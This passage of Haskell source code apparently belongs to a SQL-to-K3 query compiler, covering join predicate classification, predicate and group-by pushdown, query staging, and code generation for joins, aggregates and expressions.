(lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
jpsid <- mergeScopes lsid rsid
(jeq, jp, pfvs, psq) <- joinPredicate jpsid lsid rsid onE
josid <- aliasedOutputScope jpsid "__JR" (Just jal)
return (Node (PJoin jpsid josid (Just (nat,jointy)) jeq jp psq []) [lhs, rhs], nub $ lfvs ++ rfvs ++ pfvs)
unaryNode (FunTref _ _ _) = throwE "Table-valued functions are not supported"
joinPredicate :: ScopeId -> ScopeId -> ScopeId -> OnExpr -> SQLParseM ([(ScalarExpr, ScalarExpr)], ScalarExprList, [AttrPath], SubqueryBindings)
joinPredicate sid lsid rsid (Just (JoinOn _ joinE)) = do
conjuncts <- splitConjuncts joinE
(sepcons, nsepcons) <- classifyConjuncts sid lsid rsid conjuncts >>= return . partitionEithers
let (lseps, rseps) = unzip sepcons
(lcvs, lsubqs) <- varsAndQueries (Just sid) lseps
(rcvs, rsubqs) <- varsAndQueries (Just sid) rseps
(cvs, subqs) <- varsAndQueries (Just sid) nsepcons
return (sepcons, nsepcons, nub $ lcvs ++ rcvs ++ cvs, nub $ lsubqs ++ rsubqs ++ subqs)
joinPredicate sid _ _ (Just (JoinUsing _ nmcs)) = do
(_, _, [[lqual], [rqual]]) <- sqclkupM sid
let eqs = map (\i -> (QIdentifier emptyAnnotation [Nmc lqual, i], QIdentifier emptyAnnotation [Nmc rqual, i])) nmcs
return (eqs, [], [], [])
joinPredicate _ _ _ _ = return ([], [], [], [])
splitConjuncts :: ScalarExpr -> SQLParseM ScalarExprList
splitConjuncts e@(FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("!and", [x,y]) -> (++) <$> splitConjuncts x <*> splitConjuncts y
_ -> return [e]
splitConjuncts e = return [e]
classifyConjuncts :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM [Either (ScalarExpr, ScalarExpr) ScalarExpr]
classifyConjuncts sid lsid rsid es = do
(lrels, rrels) <- (,) <$> baseRelationsS lsid <*> baseRelationsS rsid
mapM (classifyConjunct sid lsid rsid lrels rrels) es
classifyConjunct :: ScopeId -> ScopeId -> ScopeId -> [Identifier] -> [Identifier] -> ScalarExpr
-> SQLParseM (Either (ScalarExpr, ScalarExpr) ScalarExpr)
classifyConjunct sid lsid rsid lrels rrels e@(FunCall _ nm args) = do
let fn = sqlnm nm
case sqloperator fn args of
(Just (BinaryOp OEqu x y)) -> do
(xrels, yrels) <- (,) <$> baseRelationsE sid x <*> baseRelationsE sid y
classify x y xrels yrels
_ -> return $ Right e
where
classify x y (nub -> xrels) (nub -> yrels)
| xrels `intersect` lrels == xrels && yrels `intersect` rrels == yrels = do
[nx] <- rebaseExprs sid [lsid] [x]
[ny] <- rebaseExprs sid [rsid] [y]
return $ Left (x,y)
| xrels `intersect` rrels == xrels && yrels `intersect` lrels == yrels = do
[ny] <- rebaseExprs sid [lsid] [y]
[nx] <- rebaseExprs sid [rsid] [x]
return $ Left (y,x)
| otherwise = return $ Right e
classifyConjunct _ _ _ _ _ e = return $ Right e
aggregatePath :: Maybe ScopeId -> SelectList -> SQLParseM (SelectItemList, SelectItemList, ScopeId)
aggregatePath sidOpt (SelectList _ selectL) = do
(prjs, aggs) <- mapM classifySelectItem selectL >>= return . partitionEithers
asid <- aggregateSchema sidOpt prjs aggs
return (prjs, aggs, asid)
classifySelectItem :: SelectItem -> SQLParseM (Either SelectItem SelectItem)
classifySelectItem si@(SelExp _ e) = isAggregate e >>= \agg -> return $ if agg then Right si else Left si
classifySelectItem si@(SelectItem _ e _) = isAggregate e >>= \agg -> return $ if agg then Right si else Left si
TODO : AggregateFn , Interval , LiftOperator , WindowFn
varsAndQueries :: Maybe ScopeId -> ScalarExprList -> SQLParseM ([AttrPath], SubqueryBindings)
varsAndQueries sidOpt exprs = processMany exprs
where process (FunCall _ _ args) = processMany args
process (Identifier _ (sqlnmcomponent -> i)) = trypath sidOpt (return ([[i]], [])) (const $ return ([], [])) [i]
process (QIdentifier _ (sqlnmpath -> path)) = trypath sidOpt (return ([path], [])) (const $ return ([], [])) path
process (Case _ whens elseexpr) = caseList (maybe [] (:[]) elseexpr) whens
process (CaseSimple _ expr whens elseexpr) = caseList ([expr] ++ maybe [] (:[]) elseexpr) whens
process e@(Exists _ q) = bindSubquery e q
process e@(ScalarSubQuery _ q) = bindSubquery e q
process (InPredicate _ ine _ (InList _ el)) = processMany $ ine : el
process e@(InPredicate _ ine _ (InQueryExpr _ q)) = do
(invs, inbs) <- process ine
(qvs, qbs) <- bindSubquery e q
return (invs ++ qvs, inbs ++ qbs)
process (Cast _ e _) = process e
process (Extract _ _ e) = process e
process _ = return ([], [])
concatR (a,b) (c,d) = (nub $ a++c, b++d)
concatMany l = return $ (nub . concat) *** concat $ unzip l
processMany el = mapM process el >>= concatMany
bindSubquery e q = do
sym <- ssqsextM
qcl <- query q
vbl <- mapM (\path -> trypath sidOpt (return ([path], [])) (const $ return ([], [])) path) $ qcfree qcl
return (concat $ map fst vbl, [(e, ("__subquery" ++ show sym, qcl))])
caseList extra whens = do
rl <- (\a b -> a ++ [b]) <$> mapM (\(l,e) -> processMany $ l++[e]) whens <*> processMany extra
concatMany rl
predicatePushdown :: Maybe ScopeId -> ScalarExprList -> PlanTree -> SQLParseM (PlanTree, ScalarExprList)
predicatePushdown Nothing preds jtree = return (jtree, preds)
predicatePushdown (Just sid) preds jtree = foldM push (jtree, []) preds
where
push (t, remdr) p = do
rels <- baseRelationsE sid p
(nt, accs) <- onRelLCA t rels $ inject p
return (nt, if any id accs then remdr ++ [p] else remdr)
inject p _ n@(ttag -> PTable tid tsid trOpt bmOpt chains) = do
[np] <- rebaseExprs sid [tsid] [p]
(_, npqbs) <- varsAndQueries (Just tsid) [np]
return (replaceData n $ PTable tid tsid trOpt bmOpt $ pcextSelect sid npqbs np chains, False)
inject p [lrels, rrels] n@(Node (PJoin psid osid jt jeq jp jpb chains) [l,r]) = do
(lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
[np] <- rebaseExprs sid [psid] [p]
sepE <- classifyConjunct sid lsid rsid lrels rrels np
(njeq, njp, nsubqbs) <- case sepE of
Left (lsep,rsep) -> do
(_, lqbs) <- varsAndQueries (Just lsid) [lsep]
(_, rqbs) <- varsAndQueries (Just rsid) [rsep]
return (jeq ++ [(lsep,rsep)], jp, lqbs ++ rqbs)
Right nonsep -> do
(_, rqbs) <- varsAndQueries (Just psid) [nonsep]
return (jeq, jp ++ [nonsep], rqbs)
return (replaceData n $ PJoin psid osid jt njeq njp (jpb ++ nsubqbs) chains, False)
inject _ _ n = return (n, True)
onRelLCA :: PlanTree -> [Identifier] -> ([[Identifier]] -> PlanTree -> SQLParseM (PlanTree, a)) -> SQLParseM (PlanTree, [a])
onRelLCA t rels f = do
(_,_,x,y) <- foldMapTree go (False, [], [], []) t
return (head x, y)
where
go (conc -> (True, _, nch, acc)) n = return (True, [], [replaceCh n nch], acc)
go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n@(ttag -> PTable (("__" ++) -> i) _ _ _ _)
| rels `intersect` (chrels ++ [i]) == rels = f relsByCh (replaceCh n nch) >>= \(n',r) -> return (True, [], [n'], acc++[r])
| otherwise = return (False, chrels++[i], [replaceCh n nch], acc)
go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n
| rels `intersect` chrels == rels = f relsByCh (replaceCh n nch) >>= \(n', r) -> return (True, [], [n'], acc++[r])
| otherwise = return (False, chrels, [replaceCh n nch], acc)
go _ _ = throwE "onRelLCA pattern mismatch"
conc cl = (\(a,b,c,d) -> (any id a, b, concat c, concat d)) $ unzip4 cl
groupByPushdown :: PlanTree -> ScopeId -> SelectItemList -> SelectItemList -> SQLParseM (PlanTree, SelectItemList)
groupByPushdown jtree s g a = walk s g a jtree
where
walk sid gbs aggs e@(Node n ch) = do
let onRoot = n == ttag jtree
continue <- trace (boxToString $ ["GB walk"] %$ prettyLines e) $ trypush sid gbs aggs ch n
case continue of
Left doExtend -> complete onRoot doExtend aggs sid gbs aggs $ Node n ch
Right (doExtend, naggs, chsga) -> do
nch <- mapM (\((cs,cg,ca), c) -> walk cs cg ca c >>= return . fst) $ zip chsga ch
complete onRoot doExtend naggs sid gbs naggs $ Node n nch
trypush sid gbs aggs [lt,rt] n@(PJoin psid osid _ jeq jp _ chains)
| not $ null jeq = do
jptrs <- joinAttrs psid osid jeq jp chains
aptrs <- aggAttrs psid sid aggs
let caggs = chainAggregates osid chains
let overlaps = jptrs `intersect` aptrs
case (caggs, overlaps) of
([],[]) -> do
(lsid, rsid) <- (,) <$> treeSchema lt <*> treeSchema rt
(lgbs, rgbs, remgbs) <- localizeJoin lsid rsid psid sid gbs jptrs
(laggs, raggs, remaggs, naggs) <- decomposeAggregates lsid rsid psid sid aggs
if debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs remaggs naggs $ not (null remgbs && null remaggs)
then return $ Left True
else return $ Right (True, naggs, [(lsid, lgbs, laggs), (rsid, rgbs, raggs)])
(_,_) -> return $ Left $ null caggs
| otherwise = return $ Left $ null $ chainAggregates osid chains
trypush _ _ _ _ (PJoin _ _ _ _ _ _ _) = throwE "Invalid binary join node"
trypush _ _ _ ch n@(PTable _ tsid _ _ chains) = return $ Left $ null $ chainAggregates tsid chains
trypush _ _ _ ch n@(PSubquery _ _) = return $ Left True
debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs naggs remaggs m =
trace (unwords ["Agg decomp", show psid, show osid
, "GBs:", show $ length lgbs, show $ length rgbs, show $ length remgbs
, "Aggs:", show $ length laggs, show $ length raggs, show $ length naggs, show $ length remaggs]) m
complete onRoot doExtend raggs sid gbs aggs (Node n ch) = do
n' <- refreshInputSchema n ch
n'' <- if not onRoot && doExtend then pcextGroupBy gbs aggs n' else return n'
trace (boxToString $ ["Completed"] %$ prettyLines (Node n'' ch)) $
return (Node n'' ch, if onRoot then raggs else [])
chainAggregates sid chains = concatMap snd $ pcAggExprs sid chains
joinAttrs dsid sid1 eqexprs neqexprs chains = do
eqptrs <- mapM (\(x,y) -> (++) <$> exprAttrs dsid x <*> exprAttrs dsid y) eqexprs >>= return . concat
neqptrs <- mapM (exprAttrs dsid) neqexprs >>= return . concat
let sidAndExprs = pcNonAggExprs sid1 chains
exprptrs <- concatMapM (\(ssid,el) -> concatMapM (exprAttrs ssid) el) sidAndExprs
rexprptrs <- rebaseAttrs dsid exprptrs
return $ nub $ eqptrs ++ neqptrs ++ rexprptrs
aggAttrs dsid ssid aggs = do
aggptrs <- concatMapM (exprAttrs ssid) $ projectionexprs aggs
rebaseAttrs dsid $ nub aggptrs
localizeJoin lsid rsid psid sid gbs jptrs = do
gbptrs <- concatMapM (exprAttrs sid) $ projectionexprs gbs
rgbptrs <- rebaseAttrs psid gbptrs
localizeAttrs lsid rsid psid $ rgbptrs ++ jptrs
localizeAttrs lsid rsid psid ptrs = do
nodes <- mapM sqglkupM $ nub $ ptrs
(lexprs, rexprs, rest) <- localizeInputExprs psid lsid rsid $ map (\n -> Identifier emptyAnnotation $ Nmc $ adnn n) nodes
return (map mkprojection lexprs, map mkprojection rexprs, rest)
decomposeAggregates lsid rsid psid sid aggs = do
(aggexprs, aggFns) <- aggregateexprs aggs
raggptrs <- mapM (\e -> exprAttrs sid e >>= rebaseAttrs psid) aggexprs
ragglocals <- mapM (localizeAttrs lsid rsid psid) raggptrs
foldM (decomposeAggByFn lsid rsid sid) ([], [], [], []) $ zip3 ragglocals (zip aggs aggexprs) aggFns
decomposeAggByFn lsid rsid sid (lacc, racc, acc, nacc) ((ldeps, rdeps, deps), (agg,e), fn) =
if null deps then do
(eagg, cagg, nagg) <- rewriteAgg sid (if null rdeps then lsid else rsid) fn agg e
let (nlacc, nracc) = if null rdeps then (lacc ++ [eagg], racc ++ [cagg]) else (lacc ++ [cagg], racc ++ [eagg])
return (nlacc, nracc, acc, nacc ++ [nagg])
else return (lacc, racc, acc ++ [e], nacc)
rewriteAgg ssid dsid aggFn agg e = do
ne <- rebaseExprs ssid [dsid] [e] >>= return . head
(ei, ci) <- (\a b -> ("__AGGD" ++ show a, "__AGGD" ++ show b)) <$> saggsextM <*> saggsextM
(,,) <$> mkaggregate aggFn (SelectItem emptyAnnotation e $ Nmc ei) ne
<*> mkaggregate AggCount (SelectItem emptyAnnotation e $ Nmc ci) (Star emptyAnnotation)
<*> mkaggregate aggFn agg (FunCall emptyAnnotation (Name emptyAnnotation [Nmc "*"])
[Identifier emptyAnnotation $ Nmc ei
,Identifier emptyAnnotation $ Nmc ci])
concatMapM f x = mapM f x >>= return . concat
sqlstage :: [SQLDecl] -> SQLParseM ([SQLDecl], StageGraph)
sqlstage stmts = mapM stage stmts >>= return . (concat *** concat) . unzip
where
stage s@(SQLRel _) = return ([s], [])
stage s@(SQLStage _) = throwE "SQLStage called with existing stage declarations"
stage (SQLQuery plan) = stagePlan plan >>= \(_,l,g) -> return (l,g)
stagePlan (QueryPlan tOpt chains stgOpt) = do
(ntOpt, (tstages, tstgg)) <- maybe (return (Nothing, ([], []))) (\t -> stageTree t >>= return . first Just) tOpt
(nplan, cstages, nstgg) <- stagePlanChains tstgg ntOpt stgOpt chains
return (nplan, tstages ++ cstages, nstgg)
stageTree jtree = (\((a,b),c) -> (c,(a,b))) <$> foldMapRebuildTree stageNode ([],[]) jtree
stageNode (aconcat -> (acc, [lstgg,rstgg])) ch n@(ttag -> PJoin psid osid jt jeq jp jpb chains) = do
stgid <- stgsextM >>= return . stageId . show
let (jchains, schains) = nonAggregatePrefix chains
let jtOpt = Just $ Node (PJoin psid osid jt jeq jp jpb jchains) ch
let jstage = SQLQuery $ QueryPlan jtOpt [] (Just stgid)
let nt = Node (PTable stgid osid Nothing Nothing []) []
let jstgg = stgEdges [lstgg, rstgg] stgid
(st, nstages, nstgg) <- stageNodeChains jstgg nt schains
let nstgg' = lstgg ++ rstgg ++ nstgg
kt <- k3ScopeType osid bmelem
return ((acc ++ [SQLStage (stgid, kt), jstage] ++ nstages, nstgg'), st)
stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PTable i tsid trOpt bmOpt chains) = do
let (tchains, schains) = nonAggregatePrefix chains
let nt = Node (PTable i tsid trOpt bmOpt tchains) ch
(st, nstages, nstgg) <- stageNodeChains [Left i] nt schains
return ((acc ++ nstages, concat stgg ++ nstgg), st)
stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PSubquery osid (QueryClosure fvs plan)) = do
(nplan, nstages, nstgg) <- stagePlan plan
return ((acc ++ nstages, concat stgg ++ nstgg), Node (PSubquery osid $ QueryClosure fvs nplan) ch)
stageNode _ _ n = throwE $ boxToString $ ["Invalid tree node for staging"] %$ prettyLines n
stagePlanChains stgg Nothing stgOpt chains = return (QueryPlan Nothing chains stgOpt, [], stgg)
stagePlanChains stgg (Just t) stgOpt chains = do
let (pchains, schains) = nonAggregatePrefix chains
nt <- foldM (flip pcext) t pchains
(st, nstages, nstgg) <- stageNodeChains stgg nt schains
return (QueryPlan (Just st) [] stgOpt, nstages, nstgg)
stageNodeChains stgg t chains = foldM onPath (t,[],stgg) chains
where onPath (t, acc, stggacc) p = do
pt <- pcext p t
if isNonAggregatePath p
then return (pt, acc, stggacc)
else do
stgid <- stgsextM >>= return . stageId . show
let pstage = SQLQuery $ QueryPlan (Just pt) [] (Just stgid)
osid <- treeSchema pt
bm <- treeBindingMap pt
kt <- k3ScopeType osid bm
rkt <- if not $ isAggregatePath p
then return kt
else do
et <- telemM kt
case tnc et of
(TRecord ids, ch) -> zeroT $ zip ids ch
_ -> throwE "Invalid k3 aggregate plan type"
let nt = Node (PTable stgid osid Nothing (Just bm) []) []
let nstgg = stggacc ++ stgEdges [stggacc] stgid
return (nt, acc ++ [SQLStage (stgid, rkt), pstage], nstgg)
stgEdges ll i = map (Right . (,i)) $ catMaybes $ stgCh ll
stgCh ll = map (\l -> if null l then Nothing else Just $ either id snd $ last l) ll
nonAggregatePrefix chains = fst $ foldl accum (([],[]), False) chains
where accum ((nagg,agg), found) p | not found && isNonAggregatePath p = ((nagg ++ [p], agg), False)
| otherwise = ((nagg, agg++[p]), True)
aconcat = (concat *** id) . unzip
sqlcodegen :: Bool -> ([SQLDecl], StageGraph) -> SQLParseM (K3 Declaration)
sqlcodegen distributed (stmts, stgg) = do
(decls, inits) <- foldM cgstmt ([], []) stmts
initDecl <- mkInit decls
return $ DC.role "__global" $ [master] ++ decls ++ mkPeerInit inits ++ initDecl
where
trig i = i ++ "_trigger"
(leaves, edges) = partitionEithers stgg
stagechildren = foldl (\acc (s,t) -> Map.insertWith (++) t [s] acc) Map.empty edges
stageinits = Map.foldlWithKey (\acc p ch -> if ch `intersect` leaves == ch then acc ++ [p] else acc) [] stagechildren
cgstmt (dacc, iacc) (SQLRel (i, t)) = do
gt <- twrapcolelemM t
(ldecls, linit) <- mkLoader (i,t)
return (dacc ++ [DC.global i gt Nothing] ++ ldecls, iacc ++ [linit])
cgstmt (dacc, iacc) (SQLStage (i, t)) = return (dacc ++ [DC.global i (mutT t) Nothing], iacc)
cgstmt (dacc, iacc) (SQLQuery plan) = do
(e,sid,bm,merge) <- cgplan plan
t <- k3PlanType bm plan
(outid, trigid, decls) <- case qstageid plan of
Just i -> return (i, trig i, [])
Nothing -> do
s <- stgsextM >>= return . show
let i = materializeId s
return (i, stageId s, [DC.global i (mutT t) Nothing])
let execStageF i e = case lookup i edges of
Nothing -> return e
Just next ->
let nextE = EC.send (EC.variable $ trig next) (EC.variable "me") EC.unit
execE = EC.block [e, nextE]
in annotateTriggerBody i plan merge execE
trigBodyE <- execStageF outid $ EC.assign outid e
return (dacc ++ decls ++ [ DC.trigger trigid TC.unit $ EC.lambda "_" trigBodyE ], iacc)
cgclosure (QueryClosure free plan)
| null free = cgplan plan
| otherwise = throwE "Code generation not supported for correlated queries"
cgplan (QueryPlan tOpt chains _) = do
esbmOpt <- maybe (return Nothing) (\t -> cgtree t >>= return . Just) tOpt
cgchains esbmOpt chains
cgtree n@(Node (PJoin psid osid jtOpt jeq jp jsubqbs chains) [l,r]) = do
sf@(_,_,[[lqual],[rqual]]) <- sqclkupM psid
cqaenv <- partitionCommonQualifedAttrEnv sf
(lexpr, lsid, lbm, _) <- cgtree l
(rexpr, rsid, rbm, _) <- cgtree r
(li, ri) <- (,) <$> uniqueScopeQualifier lsid <*> uniqueScopeQualifier rsid
jbm <- bindingMap [(lqual, Map.lookup [lqual] cqaenv, lbm), (rqual, Map.lookup [rqual] cqaenv, rbm)]
case (jeq, jp) of
((_:_), []) -> do
let (lexprs, rexprs) = unzip jeq
lkbodyE <- mapM (cgexpr jsubqbs Nothing lsid) lexprs >>= \es -> bindE lsid lbm (Just li) $ tupE es
rkbodyE <- mapM (cgexpr jsubqbs Nothing rsid) rexprs >>= \es -> bindE rsid rbm (Just ri) $ tupE es
obodyE <- concatE psid jbm Nothing
let lkeyE = EC.lambda lqual lkbodyE
let rkeyE = EC.lambda rqual rkbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "equijoin_kv" else "equijoin") lexpr) [rexpr, lkeyE, rkeyE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
(_, _) -> do
mbodyE <- case jp of
[] -> bindE psid jbm Nothing $ EC.constant $ CBool True
(h:t) -> cgexpr jsubqbs Nothing psid h >>= \he -> foldM (cgconjunct jsubqbs psid) he t >>= \e -> bindE psid jbm Nothing e
obodyE <- concatE psid jbm Nothing
let matchE = EC.lambda lqual $ EC.lambda rqual mbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "join_kv" else "join") lexpr) [rexpr, matchE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
cgtree (Node (PSubquery _ qcl) ch) = cgclosure qcl
cgtree n@(Node (PTable i tsid _ bmOpt chains) []) = cgchains (Just (EC.variable i, tsid, maybe bmelem id bmOpt, Nothing)) chains
cgtree _ = throwE "Invalid plan tree"
cgchains esbmOpt chains = do
resbmOpt <- foldM cgchain esbmOpt chains
maybe (throwE "Invalid chain result") return resbmOpt
cgchain (Just (e,sid,bm,_)) (PlanCPath osid selects gbs prjs aggs having subqbs) = do
fe <- case selects of
[] -> return e
l -> foldM (filterChainE sid bm subqbs) e l
case (gbs, prjs, aggs, having) of
([], [], [], Nothing) -> return $ Just (fe, osid, bm, Nothing)
([], _, _, Nothing) -> cgselectlist sid osid bm subqbs fe prjs aggs
(h:t, _, _, _) -> cggroupby sid osid bm subqbs fe gbs prjs aggs having
_ -> throwE $ "Invalid group-by and having expression pair"
cgchain Nothing (PlanCPath osid [] [] prjs [] Nothing []) = cglitselectlist [] osid prjs
cgchain Nothing _ = throwE "Invalid scalar chain component"
cggroupby sid osid bm subqbs e gbs prjs aggs having = do
i <- uniqueScopeQualifier sid
o <- uniqueScopeQualifier osid
gbie <- (\f -> foldM f (0,[]) gbs >>= return . snd) $ \(i,acc) gbe -> do
gbke <- cgexpr subqbs Nothing sid gbe
case gbe of
(Identifier _ (Nmc n)) -> return (i, acc++[(n,gbke)])
_ -> return (i+1, acc++[("f" ++ show i, gbke)])
gbbodyE <- bindE sid bm (Just i) $ case gbie of
[] -> EC.unit
[(_,e)] -> e
_ -> recE gbie
let groupF = EC.lambda i gbbodyE
(prjsymidx, prjie) <- cgprojections subqbs 0 sid prjs
prjt <- mapM (scalarexprType $ Just sid) $ projectionexprs prjs
unless (all (\((_,a), (_,b)) -> compareEAST a b) $ zip prjie gbie) $ throwE "Mismatched groupbys and projections"
(_, aggie, mergeie) <- cgaggregates subqbs prjsymidx sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggie of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggie
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
aggt <- mapM (aggregateType $ Just sid) $ projectionexprs aggs
let aggit = zip (map fst aggie) aggt
zE <- zeroE aggit
let rE = EC.applyMany (EC.project "group_by" e) [groupF, aggF, zE]
let prefixTypePath i pfx l = case l of
[] -> (i+1, [("f" ++ show i, [pfx])])
[j] -> (i, [(j, [pfx])])
_ -> (i, map (\j -> (j, [pfx, j])) l)
let (nidx, keyPaths) = prefixTypePath (0::Int) "key" $ map fst prjie
let (_, valPaths) = prefixTypePath nidx "value" $ map fst aggie
let rbm = BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
hve <- maybe (return Nothing) (havingE aggie osid rbm o) having
let hrE = maybe rE (\h -> EC.applyMany (EC.project "filter" rE) [EC.lambda o h]) hve
return $ Just (hrE, osid, rbm, Just mergeF)
where havingE aggie osid rbm o e = do
let aggei = map (\(a,b) -> (b,a)) aggie
he <- cgexpr subqbs (Just $ subAgg aggei) osid e
hbodyE <- bindE osid rbm (Just o) $ he
return $ Just hbodyE
subAgg aggei e = do
case lookup e aggei of
Nothing -> return e
Just i -> return $ EC.variable i
cgselectlist sid osid bm subqbs e prjs aggs = case (prjs, aggs) of
(p, []) -> do
i <- uniqueScopeQualifier sid
mbodyE <- cgprojections subqbs 0 sid prjs >>= \(_, fields) -> bindE sid bm (Just i) $ recE fields
let prjE = EC.applyMany (EC.project "map" e) [EC.lambda i mbodyE]
return $ Just (prjE, osid, bmelem, Nothing)
([], a) -> do
i <- uniqueScopeQualifier sid
(_, aggfields, mergeie) <- cgaggregates subqbs 0 sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggfields of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggfields
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
rElemT <- scopeType osid >>= telemM
zE <- case tnc rElemT of
(TRecord ids, ch) -> zeroE $ zip ids ch
_ -> throwE "Invalid aggregate result type"
let rexpr = EC.applyMany (EC.project "fold" e) [aggF, zE]
return $ Just (rexpr, osid, BMNone, Just mergeF)
_ -> throwE $ "Invalid mutually exclusive projection-aggregate combination"
TODO : we should not pass down here , or state assumption that is not used .
cglitselectlist subqbs sid prjs = cgprojections subqbs 0 sid prjs >>= \(_, ide) -> return $ Just (recE ide, sid, BMNone, Nothing)
cgprojections subqbs i sid l = foldM (cgprojection subqbs sid) (i, []) l
cgprojection subqbs sid (i, acc) si = do
(ni, n) <- selectItemId i si
cgaccprojection subqbs sid acc ni n $ projectionexpr si
cgaccprojection subqbs sid acc i n e = cgexpr subqbs Nothing sid e >>= \rE -> return (i, acc ++ [(n, rE)])
cgaggregates subqbs i sid l = foldM (cgaggregate subqbs sid) (i, [], []) l
cgaggregate subqbs sid (i, eacc, mrgacc) si = do
(ni, n) <- selectItemId i si
cgaccaggregate subqbs sid eacc mrgacc ni n si
cgaccaggregate subqbs sid eacc mrgacc i n si =
cgaggexpr subqbs sid si >>= \(rE, mergeE) -> return (i, eacc ++ [(n, rE)], mrgacc ++ [(n, mergeE)])
cgconjunct subqbs sid eacc e = cgexpr subqbs Nothing sid e >>= \e' -> return $ EC.binop OAnd eacc e'
cgaggexpr subqbs sid si = do
(e, aggFn) <- aggregateexpr si
aE <- cgexpr subqbs Nothing sid e
return $ case aggFn of
AggSum -> (binagg OAdd aE, mergeagg OAdd)
AggCount -> (binagg OAdd $ EC.constant $ CInt 1, mergeagg OAdd)
AggMin -> (binapp "min" aE, mergeapp "min")
AggMax -> (binapp "max" aE, mergeapp "max")
where binagg op e = EC.lambda "aggacc" $ EC.binop op (EC.variable "aggacc") e
binapp f e = EC.lambda "aggacc" $ EC.applyMany (EC.variable f) [EC.variable "aggacc", e]
mergeagg op = EC.lambda "a" $ EC.lambda "b" $ EC.binop op (EC.variable "a") $ EC.variable "b"
mergeapp f = EC.lambda "a" $ EC.lambda "b" $ EC.applyMany (EC.variable f) [EC.variable "a", EC.variable "b"]
TODO : Cast , Interval , LiftOperator , NullLit , Placeholder , PositionalArg , WindowFn
cgexpr _ _ _ (BooleanLit _ b) = return $ EC.constant $ CBool b
cgexpr _ _ _ (NumberLit _ i) = return $ if "." `isInfixOf` i
then EC.constant $ CReal $ read i
else EC.constant $ CInt $ read i
cgexpr _ _ _ (StringLit _ s) = return $ EC.constant $ CString s
cgexpr _ _ _ (TypedStringLit _ tn s) = do
t <- sqlnamedtype tn
case (tag t, find isTProperty $ annotations t) of
(TInt, Just (TProperty (tPropertyName -> "TPCHDate"))) -> return $ EC.constant $ CInt $ read $ filter (/= '-') s
(_, _) -> throwE $ boxToString $ ["Unsupported constructor for"] %$ prettyLines t
cgexpr _ _ _ (Identifier _ (sqlnmcomponent -> i)) = return $ EC.variable i
cgexpr _ _ sid (QIdentifier _ nmcl) = do
ptr <- sqcflkupM sid $ sqlnmpath nmcl
EC.variable . adnn <$> sqglkupM ptr
cgexpr subqbs f sid (Case _ whens elseexpr) = cgcase subqbs f sid elseexpr whens
cgexpr subqbs f sid (CaseSimple _ expr whens elseexpr) = cgcasesimple subqbs f sid expr elseexpr whens
cgexpr subqbs f sid e@(FunCall _ nm args) = do
isAgg <- isAggregate e
if isAgg then do
(agge,_) <- cgaggexpr subqbs sid (SelExp emptyAnnotation e)
maybe err ($ agge) f
else do
let fn = sqlnm nm
case sqloperator fn args of
(Just (UnaryOp o x)) -> EC.unop o <$> cgexpr subqbs f sid x
(Just (BinaryOp o x y)) -> EC.binop o <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y
_ -> do
case (fn, args) of
("!between", [x,y,z]) ->
let cg a b c = EC.binop OAnd (EC.binop OLeq b a) $ EC.binop OLeq a c
in cg <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y <*> cgexpr subqbs f sid z
TODO
("!like", [_,_]) -> throwE $ "LIKE operator not yet implemented"
("!notlike", [_,_]) -> throwE $ "NOTLIKE operator not yet implemented"
(_, _) -> EC.applyMany (EC.variable fn) <$> mapM (cgexpr subqbs f sid) args
where err = throwE "Invalid aggregate expression in cgexpr"
cgexpr _ _ sid (Star _) = do
(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
recE <$> mapM (\p -> singletonPath p >>= \j -> return (j, EC.variable j)) ord
cgexpr _ _ sid (QStar _ (sqlnmcomponent -> i)) = do
qattrs <- sqclkupM sid >>= qualifiedAttrs [i] >>= attrIds
recE <$> mapM (\j -> return (j, EC.variable j)) qattrs
cgexpr subqbs _ _ e@(Exists _ _) = do
(subexpr, _, _) <- cgsubquery subqbs e
emptyE False subexpr
cgexpr subqbs _ _ e@(ScalarSubQuery _ _) = cgsubquery subqbs e >>= \(r,_,_) -> return r
cgexpr subqbs f sid (InPredicate _ ine isIn (InList _ el)) = do
testexpr <- cgexpr subqbs f sid ine
valexprs <- mapM (cgexpr subqbs f sid) el
case valexprs of
[] -> return $ EC.constant $ CBool $ not isIn
(h:t) -> memoE (immutE $ testexpr) $
\vare -> return $ foldl (\accE vale -> mergeE accE $ testE vare vale) (testE vare h) t
where testE vare vale = EC.binop (if isIn then OEqu else ONeq) vare vale
mergeE acce nexte = EC.binop (if isIn then OOr else OAnd) acce nexte
